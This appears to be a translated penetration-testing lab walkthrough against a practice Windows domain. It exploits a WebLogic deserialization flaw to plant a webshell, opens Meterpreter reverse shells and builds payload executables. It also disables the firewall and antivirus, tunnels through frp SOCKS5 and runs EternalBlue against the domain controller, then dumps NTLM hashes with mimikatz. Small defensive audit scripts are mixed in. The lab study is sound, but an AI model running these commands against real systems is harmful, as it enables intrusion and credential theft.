# Environment setup

(screenshot)

WEB

Password: Asd123456789

NICs: one NAT, one host-only

The WEB host has no password the first time you log in as administrator; after logging in you are asked to set a new one.

(screenshot)

DC

Password: 1qaz@WSX

NIC: host-only

(screenshot)

PC

Password: 1qaz@WSX

NICs: one NAT, one host-only

(screenshot)

## Internal network

Host-only adapter: change the subnet to 10.10.10.0, and remember to change the DHCP range to match.

(screenshot)

## External network

NAT adapter: change the subnet to 192.168.47.0, and remember to change the DHCP range to match.

(screenshot)

Finally, remember to turn off the firewall on PC and WEB, otherwise ping will not get through.

## Kali

After I finished the configuration, Kali had not been assigned an IP address, so I added one manually:

```text
┌──(root㉿kali)-[~]
└─# cd /etc/network

┌──(root㉿kali)-[/etc/network]
└─# vi interfaces

┌──(root㉿kali)-[/etc/network]
└─# /etc/init.d/networking restart
```

(screenshot)

```text
┌──(root㉿kali)-[/etc/network]
└─# ping baidu.com
PING baidu.com (39.156.66.10) 56(84) bytes of data.
64 bytes from 39.156.66.10 (39.156.66.10): icmp_seq=1 ttl=128 time=42.9 ms
64 bytes from 39.156.66.10 (39.156.66.10): icmp_seq=2 ttl=128 time=42.6 ms
^C
--- baidu.com ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 42.617/42.765/42.914/0.148 ms

┌──(root㉿kali)-[/etc/network]
└─# ping 192.168.47.129
PING 192.168.47.129 (192.168.47.129) 56(84) bytes of data.
64 bytes from 192.168.47.129: icmp_seq=1 ttl=64 time=0.986 ms
64 bytes from 192.168.47.129: icmp_seq=2 ttl=64 time=0.478 ms
64 bytes from 192.168.47.129: icmp_seq=3 ttl=64 time=0.387 ms
64 bytes from 192.168.47.129: icmp_seq=4 ttl=64 time=0.346 ms
64 bytes from 192.168.47.129: icmp_seq=5 ttl=64 time=3.34 ms
64 bytes from 192.168.47.129: icmp_seq=6 ttl=64 time=1.28 ms
64 bytes from 192.168.47.129: icmp_seq=7 ttl=64 time=0.399 ms
64 bytes from 192.168.47.129: icmp_seq=8 ttl=64 time=0.467 ms
64 bytes from 192.168.47.129: icmp_seq=9 ttl=64 time=0.359 ms
64 bytes from 192.168.47.129: icmp_seq=10 ttl=64 time=0.378 ms
64 bytes from 192.168.47.129: icmp_seq=11 ttl=64 time=0.300 ms
^C
--- 192.168.47.129 ping statistics ---
11 packets transmitted, 11 received, 0% packet loss, time 10145ms
rtt min/avg/max/mdev = 0.300/0.792/3.339/0.857 ms
```

## Starting WebLogic

(screenshot)

Access it from Kali:

(screenshot)

That is all that is needed.

# External foothold

## nmap scan

First, scan the target IP with nmap:

```shell
nmap -sS -sV -Pn -T4 192.168.47.129
```

  • -sS: half-open SYN scan; this scan type rarely leaves scan logs on the target host.

  • -sV: version detection, probing the version of each service.

  • -Pn: skip host discovery and treat the host as up, so a host whose firewall drops ping probes still gets scanned.

  • -T4: timing template. Speed levels run from 0 to 5; the higher the number, the shorter the interval between probes and the faster the scan (T0-T2 are serial scans, T3-T5 parallel).

(screenshot)

  • Port 445 open means an SMB service is present, which may be vulnerable to MS17-010 (EternalBlue).

  • Port 7001 indicates a WebLogic service on the target, which may be affected by deserialization, SSRF, arbitrary file upload, or admin console path disclosure.

  • Port 139 open means a NetBIOS/Samba session service, which may be exposed to brute forcing / unauthenticated access / remote command execution vulnerabilities.

  • Port 1433 open means an MSSQL service, which may be exposed to brute forcing / injection / a weak SA password.

  • Port 3389 open means Remote Desktop is available.
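As an added example (not part of the original write-up), the script below turns the port-to-risk notes in the list above into a small exposure audit over nmap grepable output: it parses `-oG` lines, attaches the note for each open port, and marks ports that a web server in this lab has no reason to expose on the external segment. The sample scan output and the external allowlist are constructed assumptions, not a real scan.

```python
"""
Added example (not from the original write-up): map open ports reported by an
nmap scan to the exposure notes listed above, the way a defender would audit
what a host exposes to the external (NAT) segment.

Assumptions: the scan was saved with `nmap -oG` (grepable output); the sample
below is constructed by hand to mirror the ports the write-up found on the WEB
host, not copied from a real scan.
"""
import re

# Port-to-exposure notes, taken from the write-up's own list.
EXPOSURE_NOTES = {
    139: "NetBIOS session service: brute force / unauthenticated access risk",
    445: "SMB: check MS17-010 (EternalBlue) patch level; should not face the external segment",
    1433: "MSSQL: brute force / injection / weak SA password; should not face the external segment",
    3389: "Remote Desktop exposed: require NLA and restrict source addresses",
    7001: "WebLogic: deserialization, SSRF, file upload, console path exposure; restrict /console and /uddiexplorer",
}

# Ports a WEB server in this lab could legitimately expose externally (assumption).
EXTERNAL_ALLOWLIST = {80, 443, 7001}

# Constructed sample in nmap -oG format (not a real scan result).
SAMPLE_GREPABLE = """# Nmap 7.92 scan initiated (constructed sample)
Host: 192.168.47.129 ()  Status: Up
Host: 192.168.47.129 ()  Ports: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 1433/open/tcp//ms-sql-s///, 3389/open/tcp//ms-wbt-server///, 7001/open/tcp//http//Oracle WebLogic Server 10.3.6.0/
"""

# -oG port entry: port/state/protocol/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)//([^/]*)//([^/]*)/")


def parse_grepable(text):
    """Return {host: [(port, state, proto, service, version), ...]} from -oG output."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1]
        entries = []
        for m in PORT_RE.finditer(ports_field):
            port, state, proto, service, version = m.groups()
            entries.append((int(port), state, proto, service, version))
        hosts.setdefault(host, []).extend(entries)
    return hosts


def audit_exposure(hosts, allowlist=EXTERNAL_ALLOWLIST):
    """Return sorted (host, port, note) tuples for open ports that need attention.

    A port gets the write-up's note if one exists, plus a marker when it is not
    on the external allowlist; allowlisted ports without a note are skipped.
    """
    findings = []
    for host, entries in hosts.items():
        for port, state, _proto, _service, _version in entries:
            if state != "open":
                continue
            note = EXPOSURE_NOTES.get(port)
            if port not in allowlist:
                note = (note or "no exposure note") + " [not on external allowlist]"
            if note:
                findings.append((host, port, note))
    return sorted(findings)


if __name__ == "__main__":
    for host, port, note in audit_exposure(parse_grepable(SAMPLE_GREPABLE)):
        print(f"{host}:{port:<5} {note}")
```

Running the script on the constructed sample lists all six open ports; only 7001 comes back without the allowlist marker, which is exactly the question a defender wants answered before anyone else scans the host.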

## WebLogic vulnerability scan

First, check whether the WebLogic instance has known vulnerabilities, using these two tools:

https://github.com/rabbitmask/WeblogicScan

https://github.com/dr0op/WeblogicScan

```text
┌──(kali㉿kali)-[/home/soft/WeblogicScan-master]
└─$ python3 WeblogicScan.py -u 192.168.47.129 -p 7001
__        __   _     _             _        ____
\ \      / /__| |__ | | ___   __ _(_) ___  / ___|  ___ __ _ _ __
 \ \ /\ / / _ \ '_ \| |/ _ \ / _` | |/ __| \___ \ / __/ _` | '_ \
  \ V  V /  __/ |_) | | (_) | (_| | | (__   ___) | (_| (_| | | | |
   \_/\_/ \___|_.__/|_|\___/ \__, |_|\___| |____/ \___\__,_|_| |_|
                             |___/
                             By Tide_RabbitMask | V 1.5
Welcome To WeblogicScan !!!
Whoami:https://github.com/rabbitmask
[*] =========Task Start=========
[+] [192.168.47.129:7001] Weblogic Version Is 10.3.6.0
[+] [192.168.47.129:7001] Weblogic console address is exposed! The path is: http://192.168.47.129:7001/console/login/LoginForm.jsp
[+] [192.168.47.129:7001] Weblogic UDDI module is exposed! The path is: http://192.168.47.129:7001/uddiexplorer/
[-] [192.168.47.129:7001] weblogic not detected CVE-2016-0638
[-] [192.168.47.129:7001] weblogic not detected CVE-2016-3510
[-] [192.168.47.129:7001] weblogic not detected CVE-2017-10271
[-] [192.168.47.129:7001] weblogic not detected CVE-2017-3248
[-] [192.168.47.129:7001] weblogic not detected CVE-2017-3506
[-] [192.168.47.129:7001] weblogic not detected CVE-2018-2628
[-] [192.168.47.129:7001] weblogic not detected CVE-2018-2893
[-] [192.168.47.129:7001] weblogic not detected CVE-2018-2894
[+] [192.168.47.129:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2725
[-] [192.168.47.129:7001] weblogic not detected CVE-2019-2729
[-] [192.168.47.129:7001] weblogic not detected CVE-2019-2890
[*] =========Task E n d=========
```

(screenshot)

```text
┌──(kali㉿kali)-[/home/soft/WeblogicScan2]
└─$ python3 WeblogicScan.py  192.168.47.129 7001
/home/soft/WeblogicScan2/app/platform.py:8: SyntaxWarning: "is" with a literal. Did you mean "=="?
  if plugins is ():
__        __   _     _             _        ____
\ \      / /__| |__ | | ___   __ _(_) ___  / ___|  ___ __ _ _ __
 \ \ /\ / / _ \ '_ \| |/ _ \ / _` | |/ __| \___ \ / __/ _` | '_ \
  \ V  V /  __/ |_) | | (_) | (_| | | (__   ___) | (_| (_| | | | |
   \_/\_/ \___|_.__/|_|\___/ \__, |_|\___| |____/ \___\__,_|_| |_|
                             |___/
      From WeblogicScan V1.2 Fixed by Ra1ndr0op: drops.org.cn | V 1.3.1

Welcome To WeblogicScan !!
[*]开始检测 weblogic-console
[+]The target Weblogic console address is exposed!
[+]The path is: http://192.168.47.129:7001/console/login/LoginForm.jsp
[+]Please try weak password blasting!
[+]Weblogic后台路径存在
[*]开始检测 SSRF
[+]The target Weblogic UDDI module is exposed!
[+]The path is: http://192.168.47.129:7001/uddiexplorer/
[+]Please verify the SSRF vulnerability!
[+]SSRF 漏洞存在
[*]开始检测 CVE20192725
[+]The target weblogic has a JAVA deserialization vulnerability:CVE-2019-2725
[+]CVE-2019-2725 漏洞存在
[*]开始检测 CVE20192729
[+]The target weblogic has a JAVA deserialization vulnerability:CVE-2019-2729
[+]CVE-2019-2729 漏洞存在
[*]开始检测 CVE201710271
[-]Target weblogic not detected CVE-2017-10271
[*]开始检测 CVE20173506
[+]The target weblogic has a JAVA deserialization vulnerability:CVE-2017-3506
[+]CVE-2017-3506 漏洞存在
[*]开始检测 CVE20192618
[-]口令爆破失败:weblogic/weblogic
[-]口令爆破失败:weblogic/weblogic1
[-]口令爆破失败:weblogic/weblogic10
[-]口令爆破失败:weblogic/weblogic123
[-]口令爆破失败:weblogic/Oracle@123
[-]target Weblogic is not Vul CVE-2019-2618
[*]开始检测 CVE20182894
[-]Target weblogic not detected CVE-2018-2894
[*]开始检测 CVE20182628
[-]CVE20182628 未成功检测,请检查网络连接或或目标存在负载中间件
[*]开始检测 CVE20182893
[-]CVE20182893 未成功检测,请检查网络连接或或目标存在负载中间件
[*]开始检测 CVE20160638
[-]Target weblogic not detected CVE-2016-0638
[*]开始检测 CVE20163510
[-]Target weblogic not detected CVE-2016-3510
[*]开始检测 CVE20173248
[-]Target weblogic not detected CVE-2017-3248
```

(screenshot)

## CVE-2019-2725

Exploitation tools:

https://www.aliyundrive.com/s/FqGpaqvHcGt

https://github.com/shack2/javaserializetools/releases

(screenshot)

Then upload a webshell; for the upload path, refer to:

https://www.cnblogs.com/sstfy/p/10350915.html

```text
C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\uddiexplorer\5f6ebw\war\shell.jsp
```

(screenshot)

Connect with Behinder (冰蝎):

(screenshot)

Then get a reverse shell:

```text
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Sending stage (58053 bytes) to 192.168.47.129
[*] Meterpreter session 1 opened (192.168.47.130:4444 -> 192.168.47.129:56397 ) at 2022-08-31 02:22:21 -0400

meterpreter >
```

(screenshot)

While we are here, also turn off the firewall and the AV:

```text
netsh advfirewall set allprofiles state off    // turn off the firewall
run killav                                     // kill the AV
```

(screenshot)

The Java meterpreter does not seem to provide the AV-killing script.

To be honest, the Java meterpreter does not seem to work that well, so I switched to uploading an msf payload instead:

```text
msf6 > use payload/windows/x64/meterpreter/reverse_tcp
msf6 payload(windows/x64/meterpreter/reverse_tcp) >
msf6 payload(windows/x64/meterpreter/reverse_tcp) > ifconfig
[*] exec: ifconfig
msf6 payload(windows/x64/meterpreter/reverse_tcp) > set LHOST 172.29.31.62
LHOST => 172.29.31.62
msf6 payload(windows/x64/meterpreter/reverse_tcp) > set LPORT 5555
LPORT => 5555
msf6 payload(windows/x64/meterpreter/reverse_tcp) > generate -f exe -o exp.exe
[*] Writing 7168 bytes to exp.exe...

msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf6 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 0.0.0.0:5555
```

(screenshot)

## Getting a CS beacon

For easier management later on, switch to Cobalt Strike (CS).

First create a listener:

(screenshot)

You can connect directly from Behinder:

(screenshot)

Another way is to generate a PowerShell command:

(screenshot)

(screenshot)

However, executing this command through Behinder gets blocked by 360, whereas connecting to CS from the reverse shell does not.

# Information gathering

## net commands

```text
net config workstation                     // current computer name, full name, user name, OS version, workstation domain, logon domain, etc.
net view /domain                           // list domains
net time /domain                           // the primary domain controller also acts as the time server
net user /domain                           // list domain users
net group /domain                          // list domain groups
net group "domain computers" /domain       // list the machines in the domain
net group "domain controllers" /domain     // list the domain controllers group
net group "Enterprise Admins" /domain      // list the Enterprise Admins group
```

Change the code page first, then look at the IP addresses:

(screenshot)

There is an internal IP, 10.10.10.129.

Then check the domain information:

```text
net config workstation
```

(screenshot)

So we are in the de1ay.com domain, and the host's user is Administrator.

Check the domain controller, then look for hosts in the domain:

(screenshot)

Ping it:

(screenshot)

That does not look right; try a different approach.

## fscan

Upload fscan.exe:

(screenshot)

Scan the internal network:

```text
shell fscan.exe -h 10.10.10.129/24
```

But then:

(screenshot)

## meterpreter scans

### Host discovery

Scan for live hosts:

```text
use auxiliary/scanner/netbios/nbname
set rhosts 10.10.10.0/24
run
```

(screenshot)

```text
10.10.10.10 [DC]
10.10.10.128 [PC]
10.10.10.129 [WEB]
```

We are currently on WEB.

### Version scan

```text
use auxiliary/scanner/smb/smb_version
set rhosts
run
```

Not sure why only PC's port 445 showed up in the scan.

(screenshot)

# Lateral movement

## DC

### Building a SOCKS5 tunnel with frp

First upload frp:

(screenshot)

(screenshot)

Then edit the configuration.

frpc.ini:

```ini
[common]
server_addr = 192.168.47.130
server_port = 7000

[socks_proxy]
type = tcp
remote_port = 1579
plugin = socks5
```

frps.ini:

```ini
[common]
bind_port = 8000
```

Note that server_port in frpc.ini has to match bind_port in frps.ini for the client to connect; the two values shown here (7000 and 8000) differ, so one of them must be changed.

(screenshot)
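As an added example, not from the write-up or the frp project, here is a small detection helper that parses frpc.ini / frps.ini in the format shown above and reports what a defender reviewing a host would want flagged: SOCKS5 plugin tunnels, a server_addr outside the internal range, and a server_port that does not match the frps bind_port. The sample configs mirror the two files above; the internal range 10.10.10.0/24 is an assumption for this lab.

```python
"""
Added example (not from the original write-up or from frp): review frp client
configs the way a defender hunting for tunnelling tools would, using only the
INI format shown above.

Assumptions: the sample configs are constructed to mirror the frpc.ini and
frps.ini from the write-up; INTERNAL_NETS is a lab-specific assumption.
"""
import configparser
import ipaddress

FRPC_SAMPLE = """[common]
server_addr = 192.168.47.130
server_port = 7000

[socks_proxy]
type = tcp
remote_port = 1579
plugin = socks5
"""

FRPS_SAMPLE = """[common]
bind_port = 8000
"""

# Address ranges considered "internal" for this lab (assumption).
INTERNAL_NETS = [ipaddress.ip_network("10.10.10.0/24")]


def load_ini(text):
    """Parse INI text with the stdlib parser (frp's classic config format)."""
    cp = configparser.ConfigParser()
    cp.read_string(text)
    return cp


def is_internal(addr):
    """True if addr is an IP inside INTERNAL_NETS; hostnames count as external."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in INTERNAL_NETS)


def review_frpc(frpc_text, frps_text=None):
    """Return a list of finding strings for an frpc.ini (and optionally its frps.ini)."""
    frpc = load_ini(frpc_text)
    findings = []
    server_addr = frpc.get("common", "server_addr", fallback="")
    server_port = frpc.getint("common", "server_port", fallback=0)

    # 1. Where does the client dial out to?
    if server_addr and not is_internal(server_addr):
        findings.append(
            f"frpc connects out to {server_addr}:{server_port} outside the internal ranges"
        )

    # 2. What does each proxy section expose on the frps side?
    for section in frpc.sections():
        if section == "common":
            continue
        plugin = frpc.get(section, "plugin", fallback=None)
        remote_port = frpc.get(section, "remote_port", fallback="?")
        if plugin == "socks5":
            findings.append(
                f"[{section}] exposes a SOCKS5 proxy into this host's network on server port {remote_port}"
            )
        elif frpc.get(section, "local_port", fallback=None):
            findings.append(
                f"[{section}] forwards local port {frpc.get(section, 'local_port')} to server port {remote_port}"
            )

    # 3. Consistency check against the server config, if we have it.
    if frps_text is not None:
        bind_port = load_ini(frps_text).getint("common", "bind_port", fallback=0)
        if bind_port != server_port:
            findings.append(
                f"server_port {server_port} in frpc.ini does not match bind_port {bind_port} in frps.ini"
            )
    return findings


if __name__ == "__main__":
    for finding in review_frpc(FRPC_SAMPLE, FRPS_SAMPLE):
        print("-", finding)
```

On the sample above it reports the outbound connection to 192.168.47.130, the SOCKS5 proxy on remote port 1579, and the 7000/8000 port mismatch. The same parser can be pointed at any frpc.ini found on a host during triage.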

### Global proxy

Use proxychains:

(screenshot)

```shell
proxychains4 msfdb run
```

### EternalBlue

Because DC has no outbound internet access, the payload here has to be a bind (forward) connection.

```text
msf6 > search ms17-010
Matching Modules
================
   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.10.10
rhost => 10.10.10.10
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
[*] 10.10.10.10:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:135  ...  OK
[+] 10.10.10.10:445       - Host is likely VULNERABLE to MS17-010! - Windows Server 2012 R2 Standard 9600 x64 (64-bit)
[*] 10.10.10.10:445       - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.10:445 - The target is vulnerable.
[*] 10.10.10.10:445 - shellcode size: 1269
[*] 10.10.10.10:445 - numGroomConn: 12
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[*] 10.10.10.10:445 - Target OS: Windows Server 2012 R2 Standard 9600
[+] 10.10.10.10:445 - got good NT Trans response
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[+] 10.10.10.10:445 - got good NT Trans response
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[+] 10.10.10.10:445 - SMB1 session setup allocate nonpaged pool success
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[+] 10.10.10.10:445 - SMB1 session setup allocate nonpaged pool success
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[+] 10.10.10.10:445 - good response status for nx: INVALID_PARAMETER
[+] 10.10.10.10:445 - good response status for nx: INVALID_PARAMETER
[*] Started bind TCP handler against 10.10.10.10:4444
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:4444  ...  OK
[*] Sending stage (200262 bytes) to 10.10.10.10
[proxychains] DLL init: proxychains-ng 4.15
[*] Meterpreter session 2 opened (127.0.0.1:56250 -> 127.0.0.1:9876 ) at 2022-09-01 23:17:41 -0400
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
meterpreter > ipconfig
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 12
============
Name         : Intel(R) 82574L
Hardware MAC : 00:0c:29:ba:82:4f
MTU          : 1500
IPv4 Address : 10.10.10.10
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::5873:29f:e4b6:93cc
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 13
============
Name         : Microsoft ISATAP Adapter #2
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:a0a:a0a
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
meterpreter >
```

(screenshot)

The DC blue-screened the first time; after a reboot, a second attempt got a session.

### Getting a CS beacon on DC

You could spawn a CS beacon from msf here, but instead I simply used msf to run the CS backdoor directly.

Create a new listener:

(screenshot)

Then generate the backdoor:

(screenshot)

Next, upload the exe with msf:

(screenshot)

Then execute it:

(screenshot)

Then connect to DC:

```text
connect 10.10.10.10 7777
```

(screenshot)

### Information gathering

#### load kiwi

```text
meterpreter > load kiwi
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
Success.
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
meterpreter > creds_all
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username  Domain  NTLM                              SHA1
--------  ------  ----                              ----
DC$       DE1AY   bf01e933765eb7687ebe25a33388d402  ac0ceafbfd5a7cb01fbbdaf3c76003ad5013afce
de1ay     DE1AY   161cff084477fe596a5db81874498a24  d669f3bccf14bf77d64667ec65aae32d2d10039d
wdigest credentials
===================
Username  Domain  Password
--------  ------  --------
(null)    (null)  (null)
DC$       DE1AY   (null)
de1ay     DE1AY   (null)
kerberos credentials
====================
Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
DC$       de1ay.com  fa 6a d6 82 bb f4 0c 99 d6 88 22 ef c0 bc e7 02 af 7f 13 45 ef 4b f8 08 c9 1b 08 60 36
                     ed 7b d7 47 76 fb 4f 39 50 3e 8f 09 75 34 3a ee 20 52 c1 03 60 bd 14 c7 fd a9 93 f9 02
                     bf a4 fd 9f ae e1 f2 09 2d 4e c4 40 22 39 68 ef 1b 64 66 20 50 f4 f4 17 ba ad b7 71 19
                     b6 b9 80 f9 1a 08 48 fb 86 e8 fc 2e bb d2 b6 8f 5c ce 70 ed 08 b5 b0 f4 e9 77 a3 4c 9b
                     05 e5 ad b3 07 42 42 d0 02 41 dc 82 9a 68 96 63 5a df c3 cd 48 19 c9 36 ed e1 4b 71 c2
                     8a 76 a5 1c 19 dd 3f 93 26 87 6e 99 a5 51 af 68 6b 8b 8b 80 5d 55 89 cb 51 2d fd ea 73
                     86 16 13 18 74 e8 e3 06 22 59 2d 17 e4 72 7a 7f eb b3 d6 50 e3 1b 62 3c 73 45 d0 23 f8
                     1a c5 de 40 6f 2d 6b 44 82 6b 8e 23 fe 23 1f 52 00 b3 be b6 5e 27 bd ce 5f ff 31 8d fd
                     b3 dc 8a f8 96 7e 11 c1
dc$       de1ay.com  fa 6a d6 82 bb f4 0c 99 d6 88 22 ef c0 bc e7 02 af 7f 13 45 ef 4b f8 08 c9 1b 08 60 36
                     ed 7b d7 47 76 fb 4f 39 50 3e 8f 09 75 34 3a ee 20 52 c1 03 60 bd 14 c7 fd a9 93 f9 02
                     bf a4 fd 9f ae e1 f2 09 2d 4e c4 40 22 39 68 ef 1b 64 66 20 50 f4 f4 17 ba ad b7 71 19
                     b6 b9 80 f9 1a 08 48 fb 86 e8 fc 2e bb d2 b6 8f 5c ce 70 ed 08 b5 b0 f4 e9 77 a3 4c 9b
                     05 e5 ad b3 07 42 42 d0 02 41 dc 82 9a 68 96 63 5a df c3 cd 48 19 c9 36 ed e1 4b 71 c2
                     8a 76 a5 1c 19 dd 3f 93 26 87 6e 99 a5 51 af 68 6b 8b 8b 80 5d 55 89 cb 51 2d fd ea 73
                     86 16 13 18 74 e8 e3 06 22 59 2d 17 e4 72 7a 7f eb b3 d6 50 e3 1b 62 3c 73 45 d0 23 f8
                     1a c5 de 40 6f 2d 6b 44 82 6b 8e 23 fe 23 1f 52 00 b3 be b6 5e 27 bd ce 5f ff 31 8d fd
                     b3 dc 8a f8 96 7e 11 c1
dc$       DE1AY.COM  (null)
de1ay     DE1AY.COM  (null)
```

(screenshot)

#### net

Run net view:

(screenshot)

PC is visible.

#### fscan scan

```text
shell fscan.exe -h 10.10.10.10/24
```

(screenshot)

(screenshot)

An MSSQL service was found on the PC side, and the scan also reported an account and password, so let's use it. Honestly, though, I do not know why the address here is 129.

#### MDUT

Start the SOCKS proxy:

(screenshot)

(screenshot)

(screenshot)

Then set the proxy and open MDUT:

(screenshot)

(screenshot)

But I could not connect.
